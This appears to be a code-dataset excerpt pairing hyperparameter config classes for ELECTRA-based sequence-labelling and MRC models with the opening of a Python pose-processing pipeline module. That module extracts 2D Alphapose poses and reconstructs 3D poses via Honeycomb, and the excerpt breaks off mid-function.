self.BiLSTM_input_dropconnect = 0.0
self.BiLSTM_hidden_dropconnect = 0.0
self.BiLSTM_zoneout = 0.0
self.word_dropout = 0.05
self.hidden_size = 256
self.BiLSTM_in_dropout = 0.5
self.BiLSTM_out_dropout = 0.5
# loss config
self.use_CRF = False
self.use_sequence_label = True
self.use_DSC = False
# fine tune/ embd training
self.fine_tune_style = True
# optimizer_settings
self.fine_tune_lr = 2e-5
self.lr = 1e-3
self.wd = 1e-3
self.use_gc = True # gradient centralization
# training settings
self.total_batch_size = 32
self.train_batch_size = 16
self.val_batch_size = 16
self.early_stop_patience = 3
self.max_grad_norm = 5
self.epochs = 100
self.model_name = '(ELECTRA-SL-MRC)'
class ELECTRA_CRF_MRC_config:
def __init__(self):
# basic embedding config
self.embedding_path = 'embeddings/ELECTRA/'
self.BigTransformerDim = 1024
self.layer_num = 24
self.pool_type = 'mean'
# layer aggregation / layer selection config
self.aggregate_layers = True
self.aggregate_num = 12
self.select_a_particular_layer = False
self.select_num = 18
# BiLSTM config
self.use_BiLSTM = False
self.BiLSTM_input_dropconnect = 0.0
self.BiLSTM_hidden_dropconnect = 0.0
self.BiLSTM_zoneout = 0.0
self.word_dropout = 0.05
self.hidden_size = 256
self.BiLSTM_in_dropout = 0.5
self.BiLSTM_out_dropout = 0.5
# loss config
self.use_CRF = True
self.use_sequence_label = True
self.use_DSC = False
# fine tune/ embd training
self.fine_tune_style = True
# optimizer_settings
self.fine_tune_lr = 2e-5
self.lr = 1e-3
self.wd = 1e-3
self.use_gc = True # gradient centralization
# training settings
self.total_batch_size = 32
self.train_batch_size = 16
self.val_batch_size = 16
self.early_stop_patience = 3
self.max_grad_norm = 5
self.epochs = 100
self.model_name = '(ELECTRA-CRF-MRC)'
class ELECTRA_BiLSTM_natural_query_config:
def __init__(self):
# basic embedding config
self.embedding_path = 'embeddings/ELECTRA/'
self.BigTransformerDim = 1024
self.layer_num = 24
self.pool_type = 'mean'
# layer aggregation / layer selection config
self.aggregate_layers = True
self.aggregate_num = 12
self.select_a_particular_layer = False
self.select_num = 18
# query embeddings
self.use_pretrained_query_embedding = True
self.query_dim = 128
# BiLSTM config
self.use_BiLSTM = True
self.BiLSTM_input_dropconnect = 0.0
self.BiLSTM_hidden_dropconnect = 0.0
self.BiLSTM_zoneout = 0.0
self.word_dropout = 0.05
self.hidden_size = 256
self.BiLSTM_in_dropout = 0.5
self.BiLSTM_out_dropout = 0.5
# loss config
self.use_CRF = False
self.use_sequence_label = False
self.use_DSC = False
# fine tune/ embd training
self.fine_tune_style = False
# optimizer_settings
self.fine_tune_lr = 2e-5
self.lr = 1e-3
self.wd = 1e-3
self.use_gc = True # gradient centralization
# training settings
self.total_batch_size = 32
self.train_batch_size = 16
self.val_batch_size = 16
self.early_stop_patience = 3
self.max_grad_norm = 5
self.epochs = 100
self.model_name = '(ELECTRA-BiLSTM-natural-query)'
class ELECTRA_BiLSTM_SL_natural_query_config:
def __init__(self):
# basic embedding config
self.embedding_path = 'embeddings/ELECTRA/'
self.BigTransformerDim = 1024
self.layer_num = 24
self.pool_type = 'mean'
# layer aggregation / layer selection config
self.aggregate_layers = True
self.aggregate_num = 12
self.select_a_particular_layer = False
self.select_num = 18
# query embeddings
self.use_pretrained_query_embedding = True
self.query_dim = 128
# BiLSTM config
self.use_BiLSTM = True
self.BiLSTM_input_dropconnect = 0.0
self.BiLSTM_hidden_dropconnect = 0.0
self.BiLSTM_zoneout = 0.0
self.word_dropout = 0.05
self.hidden_size = 256
self.BiLSTM_in_dropout = 0.5
self.BiLSTM_out_dropout = 0.5
# loss config
self.use_CRF = False
self.use_sequence_label = True
self.use_DSC = False
# fine tune/ embd training
self.fine_tune_style = False
# optimizer_settings
self.fine_tune_lr = 2e-5
self.lr = 1e-3
self.wd = 1e-3
self.use_gc = True # gradient centralization
# training settings
self.total_batch_size = 32
self.train_batch_size = 16
self.val_batch_size = 16
self.early_stop_patience = 3
self.max_grad_norm = 5
self.epochs = 100
self.model_name = '(ELECTRA-BiLSTM-SL-natural-query)'
class ELECTRA_BiLSTM_CRF_natural_query_config:
def __init__(self):
# basic embedding config
self.embedding_path = 'embeddings/ELECTRA/'
self.BigTransformerDim = 1024
self.layer_num = 24
self.pool_type = 'mean'
# layer aggregation / layer selection config
self.aggregate_layers = True
self.aggregate_num = 12
self.select_a_particular_layer = False
self.select_num = 18
# query embeddings
self.use_pretrained_query_embedding = True
self.query_dim = 128
# BiLSTM config
self.use_BiLSTM = True
self.BiLSTM_input_dropconnect = 0.0
self.BiLSTM_hidden_dropconnect = 0.0
self.BiLSTM_zoneout = 0.0
self.word_dropout = 0.05
self.hidden_size = 256
self.BiLSTM_in_dropout = 0.5
self.BiLSTM_out_dropout = 0.5
# loss config
self.use_CRF = True
self.use_sequence_label = True
self.use_DSC = False
# fine tune/ embd training
self.fine_tune_style = False
# optimizer_settings
self.fine_tune_lr = 2e-5
self.lr = 1e-3
self.wd = 1e-3
self.use_gc = True # gradient centralization
# training settings
self.total_batch_size = 32
self.train_batch_size = 16
self.val_batch_size = 16
self.early_stop_patience = 3
self.max_grad_norm = 5
self.epochs = 100
self.model_name = '(ELECTRA-BiLSTM-CRF-natural-query)'
class ELECTRA_BiLSTM_MRC_config:
def __init__(self):
# basic embedding config
self.embedding_path = 'embeddings/ELECTRA/'
self.BigTransformerDim = 1024
self.layer_num = 24
self.pool_type = 'mean'
# layer aggregation / layer selection config
self.aggregate_layers = True
self.aggregate_num = 12
self.select_a_particular_layer = False
self.select_num = 18
# query embeddings
self.use_pretrained_query_embedding = False
self.query_dim = 128
# BiLSTM config
self.use_BiLSTM = True
self.BiLSTM_input_dropconnect = 0.0
self.BiLSTM_hidden_dropconnect = 0.0
self.BiLSTM_zoneout = 0.0
self.word_dropout = 0.05
self.hidden_size = 256
self.BiLSTM_in_dropout = 0.5
self.BiLSTM_out_dropout = 0.5
# loss config
self.use_CRF = False
self.use_sequence_label = False
self.use_DSC = False
# fine tune/ embd training
self.fine_tune_style = False
# optimizer_settings
self.fine_tune_lr = 2e-5
self.lr = 1e-3
self.wd = 1e-3
self.use_gc = True # gradient centralization
# training settings
self.total_batch_size = 32
self.train_batch_size = 16
self.val_batch_size = 16
self.early_stop_patience = 3
self.max_grad_norm = 5
self.epochs = 100
self.model_name = '(ELECTRA-BiLSTM-MRC)'
class ELECTRA_BiLSTM_SL_MRC_config:
def __init__(self):
# basic embedding config
self.embedding_path = 'embeddings/ELECTRA/'
self.BigTransformerDim = 1024
self.layer_num = 24
self.pool_type = 'mean'
# layer aggregation / layer selection config
self.aggregate_layers = True
self.aggregate_num = 12
self.select_a_particular_layer = False
self.select_num = 18
# query embeddings
self.use_pretrained_query_embedding = False
self.query_dim = 128
# BiLSTM config
self.use_BiLSTM = True
self.BiLSTM_input_dropconnect = 0.0
self.BiLSTM_hidden_dropconnect = 0.0
self.BiLSTM_zoneout = 0.0
self.word_dropout = 0.05
self.hidden_size = 256
self.BiLSTM_in_dropout = 0.5
self.BiLSTM_out_dropout = 0.5
# loss config
self.use_CRF = False
self.use_sequence_label = True
self.use_DSC = False
# fine tune/ embd training
self.fine_tune_style = False
# optimizer_settings
self.fine_tune_lr = 2e-5
self.lr = 1e-3
self.wd = 1e-3
self.use_gc = True # gradient centralization
# training settings
self.total_batch_size = 32
self.train_batch_size = 16
self.val_batch_size = 16
self.early_stop_patience = 3
self.max_grad_norm = 5
self.epochs = 100
self.model_name = '(ELECTRA-BiLSTM-SL-MRC)'
class ELECTRA_BiLSTM_CRF_MRC_config:
def __init__(self):
# basic embedding config
self.embedding_path = 'embeddings/ELECTRA/'
self.BigTransformerDim = 1024
self.layer_num = 24
self.pool_type = 'mean'
# layer aggregation / layer selection config
self.aggregate_layers = True
self.aggregate_num = 12
self.select_a_particular_layer = False
self.select_num = 18
# query embeddings
self.use_pretrained_query_embedding = False
self.query_dim = 128
# BiLSTM config
self.use_BiLSTM = True
self.BiLSTM_input_dropconnect = 0.0
self.BiLSTM_hidden_dropconnect = 0.0
self.BiLSTM_zoneout = 0.0
self.word_dropout = 0.05
self.hidden_size = 256
self.BiLSTM_in_dropout = 0.5
self.BiLSTM_out_dropout = 0.5
# loss config
self.use_CRF = True
self.use_sequence_label = True
self.use_DSC = False
# fine tune/ embd training
self.fine_tune_style = False
# optimizer_settings
self.fine_tune_lr = 2e-5
self.lr = 1e-3
self.wd = 1e-3
self.use_gc = True # gradient centralization
# training settings
self.total_batch_size = 32
self.train_batch_size = 16
self.val_batch_size = 16
self.early_stop_patience = 3
self.max_grad_norm = 5
self.epochs = 100
self.model_name = '(ELECTRA-BiLSTM-CRF-MRC)'
| 28.481481 | 62 | 0.612758 | 1,844 | 14,611 | 4.57321 | 0.047722 | 0.046484 | 0.021345 | 0.040318 | 0.981501 | 0.970236 | 0.970236 | 0.970236 | 0.970236 | 0.970236 | 0 | 0.044784 | 0.31839 | 14,611 | 512 | 63 | 28.537109 | 0.801988 | 0.128739 | 0 | 0.932749 | 0 | 0 | 0.036146 | 0.01139 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02924 | false | 0 | 0 | 0 | 0.05848 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba7f15460f98949cb0681069331165602dc82e77 | 150,218 | py | Python | process_pose_data/process.py | WildflowerSchools/wf-process-pose-data | 17d5c1380cfd4dd876a3a5740db904f9e3f4aabe | [
"MIT"
] | 1 | 2021-03-03T22:18:23.000Z | 2021-03-03T22:18:23.000Z | process_pose_data/process.py | WildflowerSchools/wf-process-pose-data | 17d5c1380cfd4dd876a3a5740db904f9e3f4aabe | [
"MIT"
] | 1 | 2020-08-15T20:12:21.000Z | 2022-01-26T19:33:24.000Z | process_pose_data/process.py | WildflowerSchools/wf-process-pose-data | 17d5c1380cfd4dd876a3a5740db904f9e3f4aabe | [
"MIT"
] | 1 | 2020-08-14T04:13:00.000Z | 2020-08-14T04:13:00.000Z | import process_pose_data.local_io
import process_pose_data.overlay
import poseconnect.reconstruct
import poseconnect.track
import poseconnect.identify
import honeycomb_io
import video_io
import pandas as pd
import tqdm
from uuid import uuid4
import multiprocessing
import functools
import logging
import datetime
import time
logger = logging.getLogger(__name__)
def extract_poses_2d_alphapose_local_by_time_segment(
start,
end,
base_dir,
environment_id,
camera_assignment_ids=None,
alphapose_subdirectory='prepared',
tree_structure='file-per-frame',
poses_2d_file_name='alphapose-results.json',
poses_2d_json_format='cmu',
pose_processing_subdirectory='pose_processing',
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
task_progress_bar=False,
notebook=False
):
"""
Fetches 2D pose data from local Alphapose output and writes back to local files.
Input data is assumed to be organized according to standard Alphapose
pipeline output (see documentation for that pipeline).
If camera assignment IDs are not specified, function will query Honeycomb
for cameras assigned to the specified environment over the specified period
Output data is organized into 10 second segments (mirroring source videos),
saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_extraction_2d/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/poses_2d_INFERENCE_ID.pkl\'
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_extraction_2d/ENVIRONMENT_ID/pose_extraction_2d_metadata_INFERENCE_ID.pkl\'
Args:
start (datetime): Start of period to be analyzed
end (datetime): End of period to be analyzed
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
camera_assignment_ids (list of str): Cameras to include (default is None)
alphapose_subdirectory (str): subdirectory (under base directory) for Alphapose output (default is \'prepared\')
poses_2d_file_name: Filename for Alphapose data in each directory (default is \'alphapose-results.json\')
poses_2d_json_format: Format of Alphapose results files (default is\'cmu\')
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
client (MinimalHoneycombClient): Honeycomb client (otherwise generates one) (default is None)
uri (str): Honeycomb URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
token_uri (str): Honeycomb token URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
audience (str): Honeycomb audience (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_id (str): Honeycomb client ID (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_secret (str): Honeycomb client secret (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display a progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start=start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end=end.replace(tzinfo=datetime.timezone.utc)
logger.info('Extracting 2D poses from local Alphapose output. Base directory: {}. Alphapose data subdirectory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
alphapose_subdirectory,
pose_processing_subdirectory,
environment_id,
start,
end
))
logger.info('Generating metadata')
pose_extraction_2d_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_extraction_2d',
parameters={
'start': start,
'end': end
}
)
inference_id = pose_extraction_2d_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_extraction_2d_metadata,
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='pose_extraction_2d_metadata',
inference_id=pose_extraction_2d_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
if camera_assignment_ids is None:
logger.info('Querying Honycomb for cameras assigned to environment \'{}\' in the period {} to {}'.format(
environment_id,
start.isoformat(),
end.isoformat()
))
camera_info = honeycomb_io.fetch_camera_info(
environment_id=environment_id,
environment_name=None,
start=start,
end=end,
chunk_size=100,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
camera_assignment_ids = camera_info['assignment_id'].unique().tolist()
num_cameras = len(camera_assignment_ids)
logger.info('Extracting 2D poses for {} cameras and {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_cameras,
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
processing_start = time.time()
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
previous_carryover_poses = None
for time_segment_start in time_segment_start_iterator:
current_poses, carryover_poses = process_pose_data.local_io.fetch_2d_pose_data_alphapose_local_time_segment(
base_dir=base_dir,
environment_id=environment_id,
time_segment_start=time_segment_start,
camera_assignment_ids=camera_assignment_ids,
carryover_poses = previous_carryover_poses,
alphapose_subdirectory=alphapose_subdirectory,
tree_structure=tree_structure,
filename=poses_2d_file_name,
json_format=poses_2d_json_format
)
if previous_carryover_poses is not None and len(previous_carryover_poses) > 0:
poses_2d_df_time_segment = (
pd.concat((
previous_carryover_poses,
current_poses
))
.sort_values(['timestamp', 'assignment_id'])
)
else:
poses_2d_df_time_segment=current_poses
process_pose_data.local_io.write_data_local(
data_object=poses_2d_df_time_segment,
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='poses_2d',
inference_id=inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
previous_carryover_poses = carryover_poses
processing_time = time.time() - processing_start
logger.info('Extracted {:.3f} minutes of 2D poses in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return inference_id
def extract_poses_2d_alphapose_local_by_time_segment_legacy(
start,
end,
base_dir,
environment_id,
alphapose_subdirectory='prepared',
tree_structure='file-per-frame',
poses_2d_file_name='alphapose-results.json',
poses_2d_json_format='cmu',
pose_processing_subdirectory='pose_processing',
task_progress_bar=False,
notebook=False
):
"""
Fetches 2D pose data from local Alphapose output and writes back to local files.
Input data is assumed to be organized according to standard Alphapose
pipeline output (see documentation for that pipeline).
Output data is organized into 10 second segments (mirroring source videos),
saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_extraction_2d/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/poses_2d_INFERENCE_ID.pkl\'
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_extraction_2d/ENVIRONMENT_ID/pose_extraction_2d_metadata_INFERENCE_ID.pkl\'
Args:
start (datetime): Start of period to be analyzed
end (datetime): End of period to be analyzed
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
alphapose_subdirectory (str): subdirectory (under base directory) for Alphapose output (default is \'prepared\')
poses_2d_file_name: Filename for Alphapose data in each directory (default is \'alphapose-results.json\')
poses_2d_json_format: Format of Alphapose results files (default is\'cmu\')
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
task_progress_bar (bool): Boolean indicating whether script should display a progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start=start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end=end.replace(tzinfo=datetime.timezone.utc)
logger.info('Extracting 2D poses from local Alphapose output. Base directory: {}. Alphapose data subdirectory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
alphapose_subdirectory,
pose_processing_subdirectory,
environment_id,
start,
end
))
logger.info('Generating metadata')
pose_extraction_2d_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_extraction_2d',
parameters={
'start': start,
'end': end
}
)
inference_id = pose_extraction_2d_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_extraction_2d_metadata,
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='pose_extraction_2d_metadata',
inference_id=pose_extraction_2d_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Extracting 2D poses for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
processing_start = time.time()
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
for time_segment_start in time_segment_start_iterator:
poses_2d_df_time_segment = process_pose_data.local_io.fetch_2d_pose_data_alphapose_local_time_segment(
base_dir=base_dir,
environment_id=environment_id,
time_segment_start=time_segment_start,
alphapose_subdirectory=alphapose_subdirectory,
tree_structure=tree_structure,
filename=poses_2d_file_name,
json_format=poses_2d_json_format
)
process_pose_data.local_io.write_data_local(
data_object=poses_2d_df_time_segment,
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='poses_2d',
inference_id=inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
processing_time = time.time() - processing_start
logger.info('Extracted {:.3f} minutes of 2D poses in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return inference_id
def reconstruct_poses_3d_local_by_time_segment(
base_dir,
environment_id,
pose_extraction_2d_inference_id,
pose_model_id,
room_x_limits,
room_y_limits,
start=None,
end=None,
camera_assignment_ids=None,
camera_device_id_lookup=None,
camera_calibrations=None,
coordinate_space_id=None,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
pose_processing_subdirectory='pose_processing',
min_keypoint_quality=None,
min_num_keypoints=None,
min_pose_quality=None,
min_pose_pair_score=None,
max_pose_pair_score=25.0,
pose_pair_score_distance_method='pixels',
pose_pair_score_pixel_distance_scale=5.0,
pose_pair_score_summary_method='rms',
pose_3d_limits=None,
pose_3d_graph_initial_edge_threshold=2,
pose_3d_graph_max_dispersion=0.20,
include_track_labels=False,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches 2D pose data from local files, reconstructs 3D poses, and writes output back to local files.
If camera information is not specified, script pulls camera data from
Honeycomb based on environment ID, start time, and end time.
Options for pose pair score distance method are \'pixels\' (simple 2D distance
measured in pixels) or \'probability\' (likelihood of that distance assuming
2D Gaussian reprojection error).
Options for pose pair score summary method are \'rms\' (root mean square of
distances across keypoints) or \'sum\' (sum of distances across keypoints).
3D pose limits are an array with shape (2, NUM_KEYPOINTS, 3) specifying the
minimum and maximum possible coordinate values for each type of keypoint
(for filtering 3D poses). If these limits are not specified, script
calculates default limits based on room x and y limits and pose model.
Candidate 3D poses are validated and grouped into people using an adaptive
strategy. After initial pose filtering, the algorithm forms a graph with 2D
poses as nodes and candidate 3D poses as edges. This graph is then split
into k-edge-connected subgraphs (people), starting with the specified
initial k (i.e., if k > 1, each person must be confirmed by matches across
multiple cameras). If the spatial dispersion of the 3D poses for any
subgraph (person) exceeds the specified threshold (suggesting that multiple
people are being conflated), k is increased for that subgraph, effectively
splitting the subgraph. This process repeats until all subgraphs (people)
fall below the maximum spatial dispersion (a valid person) or below minimum
k (poses are rejected).
Input data is assumed to be organized as specified by
extract_poses_2d_alphapose_local_by_time_segment().
Output data is organized into 10 second segments (mirroring source videos),
saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_reconstruction_3d/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/poses_3d_INFERENCE_ID.pkl\'
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_reconstruction_3d/ENVIRONMENT_ID/pose_reconstruction_3d_metadata_INFERENCE_ID.pkl\'
Args:
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_extraction_2d_inference_id (str): Inference ID for source data
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
room_x_limits (sequence of float): Boundaries of room in x direction in [MIN, MAX] format (for filtering 3D poses)
room_y_limits (sequence of float): Boundaries of room in y direction in [MIN, MAX] format (for filtering 3D poses)
start (datetime): Start of period within source data to be analyzed (default is None)
end (datetime): End of period within source data to be analyzed (default is None)
camera_assignment_ids (sequence of str): List of camera assignment IDs to analyze (default is None)
camera_device_id_lookup (dict): Dict in format {ASSSIGNMENT_ID: DEVICE ID} (default is None)
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
coordinate_space_id (dict): Coordinate space ID of extrinsic camera calibrations (and therefore 3D pose output) (default is None)
client (MinimalHoneycombClient): Honeycomb client (otherwise generates one) (default is None)
uri (str): Honeycomb URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
token_uri (str): Honeycomb token URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
audience (str): Honeycomb audience (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_id (str): Honeycomb client ID (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_secret (str): Honeycomb client secret (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
min_keypoint_quality (float): Minimum keypoint quality for keypoint to be included (default is None)
min_num_keypoints (float): Mininum number of keypoints (after keypoint quality filter) for 2D pose to be included (default is None)
min_pose_quality=None (float): Minimum pose quality for 2D pose to be included (default is None)
min_pose_pair_score (float): Minimum pose pair score for pose pair to be included (default is None)
max_pose_pair_score (float): Maximum pose pair for pose pair to be included (default is 25.0)
pose_pair_score_distance_method (str): Method for calculating distance between original and reprojected pose keypoints (default is \'pixels\')
pose_pair_score_pixel_distance_scale (float): Pixel distance scale for \'probability\' method (default is 5.0)
pose_pair_score_summary_method (str): Method for summarizing reprojected keypoint distance over pose (default is \'rms\')
pose_3d_limits (array): Spatial limits for each type of pose keypoint (for filtering candidate 3D poses) (default is None)
pose_3d_graph_initial_edge_threshold (int): Minimum number of pose pairs in pose (edges in graph) (default is 2)
pose_3d_graph_max_dispersion (float): Keypoint dispersion threshold for increasing required number of edges (default is 0.20)
include_track_labels (bool): Boolean indicating whether to include source 2D track labels in 3D pose data (default is False)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each time segment (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
pose_extraction_2d_metadata = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='pose_extraction_2d_metadata',
inference_ids=pose_extraction_2d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
if start is None:
start = pose_extraction_2d_metadata['parameters']['start']
if end is None:
end = pose_extraction_2d_metadata['parameters']['end']
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start=start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end=end.replace(tzinfo=datetime.timezone.utc)
logger.info('Reconstructing 3D poses from local 2D pose data. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
pose_processing_subdirectory,
environment_id,
start,
end
))
logger.info('Generating metadata')
if camera_assignment_ids is None:
logger.info('Camera assignment IDs not specified. Fetching camera assignment IDs from Honeycomb based on environmen and time span')
camera_assignment_ids = honeycomb_io.fetch_camera_assignment_ids_from_environment(
start=start,
end=end,
environment_id=environment_id,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if camera_device_id_lookup is None:
logger.info('Camera device ID lookup table not specified. Fetching camera device ID info from Honeycomb based on camera assignment IDs')
camera_device_id_lookup = honeycomb_io.fetch_camera_device_id_lookup(
assignment_ids=camera_assignment_ids,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
camera_device_ids = list(camera_device_id_lookup.values())
if camera_calibrations is None:
logger.info('Camera calibration parameters not specified. Fetching camera calibration parameters from Honeycomb based on camera device IDs and time span')
camera_calibrations = honeycomb_io.fetch_camera_calibrations(
camera_ids=camera_device_ids,
start=start,
end=end,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if coordinate_space_id is None:
coordinate_space_id = extract_coordinate_space_id_from_camera_calibrations(camera_calibrations)
if pose_3d_limits is None:
logger.info('3D pose spatial limits not specified. Generating default spatial limits based on specified room spatial limits and specified pose model')
pose_3d_limits = generate_pose_3d_limits(
pose_model_id=pose_model_id,
room_x_limits=room_x_limits,
room_y_limits=room_y_limits,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
pose_reconstruction_3d_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_reconstruction_3d',
parameters={
'pose_extraction_2d_inference_id': pose_extraction_2d_inference_id,
'start': start,
'end': end,
'pose_model_id': pose_model_id,
'room_x_limits': room_x_limits,
'room_y_limits': room_y_limits,
'camera_assignment_ids': camera_assignment_ids,
'camera_device_id_lookup': camera_device_id_lookup,
'camera_device_ids': camera_device_ids,
'camera_calibrations': camera_calibrations,
'coordinate_space_id': coordinate_space_id,
'min_keypoint_quality': min_keypoint_quality,
'min_num_keypoints': min_num_keypoints,
'min_pose_quality': min_pose_quality,
'min_pose_pair_score': min_pose_pair_score,
'max_pose_pair_score': max_pose_pair_score,
'pose_pair_score_distance_method': pose_pair_score_distance_method,
'pose_pair_score_pixel_distance_scale': pose_pair_score_pixel_distance_scale,
'pose_pair_score_summary_method': pose_pair_score_summary_method,
'pose_3d_limits': pose_3d_limits,
'pose_3d_graph_initial_edge_threshold': pose_3d_graph_initial_edge_threshold,
'pose_3d_graph_max_dispersion': pose_3d_graph_max_dispersion,
'include_track_labels': include_track_labels
}
)
inference_id = pose_reconstruction_3d_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_reconstruction_3d_metadata,
base_dir=base_dir,
